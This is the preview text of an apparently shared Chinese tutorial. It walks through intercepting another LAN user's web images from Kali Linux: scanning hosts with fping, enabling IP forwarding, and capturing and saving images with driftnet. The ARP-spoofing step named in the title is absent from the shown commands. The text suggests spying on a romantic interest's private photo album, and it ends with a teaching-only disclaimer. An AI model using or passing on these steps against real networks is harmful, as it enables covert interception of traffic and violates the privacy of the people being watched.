文档详情

操作指导书使用ARP欺骗获取局域网内电脑正在浏览的图片.doc

发布:2017-08-15约小于1千字共5页下载文档
文本预览下载声明
获取局域网目标的图片 1、环境需求 渗透环境:kali 目标环境:win7(win10可能不成功,win8留给大家自己尝试) 2、开始实验 (1)打开一个终端,扫描局域网正在连接的IP 命令:fping -asg 192.168.0.1/24(具体要看本机ip地址,根据局域网环境选择0段、1段或是其他) 图中192.168.0.1 很明显是网关 正在连接的主机,110和114 (2)开启转发命令 echo 1 /proc/sys/net/ipv4/ip_forward //1状态,目标对象的网络数据都要经过本机网卡转发 查看 cat /proc/sys/net/ipv4/ip_forward? 返回1 说明开启了 在终端中打开一个新标签 此时确认目标对象依然能正常上网 (3)用命令获取目标对象上网图片 driftnet -i eth0 可以看到目标对象很可能正在京东上网购,是不是有种小工具有大作用的意思! (4)用Ctrl+C/Z 终止攻击 (5)细心的同志可能会发现图片只能看,好像不能操作,比如保存下来。如果目标对象是你心仪的她,正在看自己qq空间的私密相册,那么很可能就有保存价值啦。 在kali当中要学会使用帮助命令 各种参数的释义,找到我们需要的保存参数。 driftnet -d /tmp //用-d参数,保存在tmp目录下 (5)over! 其他参数,请大家自己操作 3、小结 本实验在win10和win7上分别试过,win7成功截取到图片,win10没成功,原因不明。 4、郑重声明 本教程只做教学及学习使用,请大家切勿随意乱用,以免造成意外后果,所有后果大家自行负责。
显示全部
相似文档